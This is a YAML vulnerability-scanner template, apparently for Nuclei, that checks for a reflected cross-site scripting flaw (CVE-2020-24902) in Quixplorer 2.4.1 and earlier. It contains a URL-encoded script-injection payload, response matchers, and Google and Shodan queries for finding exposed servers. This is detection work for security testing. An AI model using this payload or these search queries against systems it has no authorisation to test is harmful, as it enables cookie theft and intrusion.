47 lines
1.5 KiB
YAML
47 lines
1.5 KiB
YAML
id: CVE-2020-24902
|
|
|
|
info:
|
|
name: Quixplorer <=2.4.1 - Cross Site Scripting
|
|
author: edoardottt
|
|
severity: medium
|
|
description: |
|
|
Quixplorer <=2.4.1 is vulnerable to reflected cross-site scripting (XSS) caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
|
|
reference:
|
|
- https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24902
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-24902
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
google-dork: intitle:"My Download Server"
|
|
shodan-query: http.title:"My Download Server"
|
|
verified: "true"
|
|
tags: cve,cve2020,quixplorer,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<script>alert(document.domain)</script>&srt=yes"
|
|
- "My Download"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|